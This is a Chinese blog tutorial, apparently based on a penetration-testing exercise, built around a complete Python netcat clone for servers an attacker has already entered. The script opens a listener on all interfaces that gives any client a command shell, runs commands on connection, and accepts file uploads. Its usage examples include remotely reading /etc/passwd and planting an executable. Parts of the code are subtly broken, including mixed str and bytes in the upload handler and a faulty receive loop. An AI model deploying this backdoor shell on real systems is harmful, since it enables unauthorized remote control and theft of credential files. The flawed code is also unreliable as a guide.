python编写“瑞士军刀”NetCat

当进入的服务器没有安装netcat却安装了Python。在这种情况下,需要创建一个简单的客户端和服务器来传递想使用的文件,或者创建一个监听端让自己拥有控制命令行的操作权限。

#!/usr/bin/env python3
# -*- code:utf-8 -*-

import sys
import socket
import getopt
import threading
import subprocess

# 定义全局变量
listen = False
command = False  # 是否建立shell
upload = False
execute = ""  # 目标机中执行得命令
target = ""
port = 0
upload_destination = ""  # 上传文件路径


def run_command(command):

    #换行
    command = command.rstrip()
    #运行命令并将输出返回
    try:
        output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
    except:
        output = b"Failed to execute command.\r\n"

    #将输出发送
    return output


def client_handler(client_socket):
    global upload
    global execute
    global command

    #检查上传文件
    if len(upload_destination):

        #读取所有的字符并写下目标
        file_buffer = ""

        #持续读取数据知道没有符合的数据

        while True:
            data = client_socket.recv(1024)

            if not data:
                break
            else:
                file_buffer += data

        #现在将我们接收这些数据并将他们写下来

        try:
            file_descriptor = open(upload_destination,"wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()

            #确认文件已经写出来
            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
        except:
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)


    #检查命令执行
    if len(execute):

        #运行命令
        output = run_command(execute)

        client_socket.send(output)

    #如果需要一个命令行shell,那么进入另一个循环
    if command:

        while True:
            #跳出一个窗口
            client_socket.send(b" ")

            #接收文件直到发现换行符(enter key)
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024).decode("utf-8")

            #返回命令输出
            response = run_command(cmd_buffer)

            #返回响应数据
            client_socket.send(response)


def server_loop():
    global target
    global port

    #如果没有定义目标,那我们监听所有端口
    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target,port))

    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        #拆分一个线程处理新的客户端
        client_thread = threading.Thread(target=client_handler,args=(client_socket,))
        client_thread.start()


#客户端发送消息,并接收服务端的消息
def client_sender(buffer):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        #连接到目标主机
        client.connect((target,port))

        if len(buffer):
            client.send(buffer.encode("utf-8"))

        while True:

            #等待数据回传
            recv_len = 1
            response = ""

            while recv_len:

                data = client.recv(4096)

                response += data.decode("utf-8")

                if recv_len < 4096:
                    break

            print (response,end=" ")

            #等待其他输入
            #python3 中没有raw_input整合为input()
            buffer = input("")
            buffer += "\n"

            #发送出去
            client.send(buffer.encode("utf-8"))

    except:
        print("[*] Exception! Exiting.")
        client.close()


#使用手册
def usage():
    print("Netcat")
    print("Usage: nc.py -t target_host -p port")
    print("-l --listen              - listen on [host]:[port] for incoming connections")
    print("-e --execute=file_to_run -execute the given file upon receiving a connection")
    print("-c --command             -initialize a command shell")
    print("-u --upload=destination  -upon receiving connection upload a file and write to [destination]")
    print("Examples: ")
    print("nc.py -t 192.168.0.1 -p 4444 -l -c")
    print("nc.py -t 192.168.0.1 -p 4444 -l -u=c:\\target.exe")
    print("nc.py -t 192.168.0.1 -p 4444 -l -e=\"cat /etc/passwd\"")
    print("echo 'ABCDEFG' | ./nc.py -t 192.168.0.1 -p 4444")
    sys.exit(0)


# 主函数,处理命令行参数,调用其他函数
def main():
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    # 读取命令行选项
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",
                                   ["help", "listen", "execute", "target", "port", "command", "upload"])
    except getopt.GetoptError as err:
        print(str(err))
        usage()

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--commandshell"):
            command = True
        elif o in ("-u", "--upload"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)
        else:
            assert False, "Unhandled Option"


# 我们是进行监听还是仅从标准输入发送数据
    if not listen and len(target) and port > 0:
        # 从命令行读取内存数据
        # 这里将堵塞,所以不在向标准输入发送CTRL-D
        buffer = sys.stdin.read()

        #发送数据
        client_sender(buffer)

    #我们开始监听准备上传文件,执行命令
    #放置一个反弹shell
    #取决于上面的命令行选项
    if listen:
        server_loop()


if  __name__ == '__main__':
    main()

服务端
python编写“瑞士军刀”NetCat_第1张图片
客户端连接
python编写“瑞士军刀”NetCat_第2张图片利用客户端发送HTTP请求
python编写“瑞士军刀”NetCat_第3张图片

人生漫漫其修远兮,网安无止境。
一同前行,加油!

你可能感兴趣的:(python安全,python,linux,shell,渗透测试,内网渗透)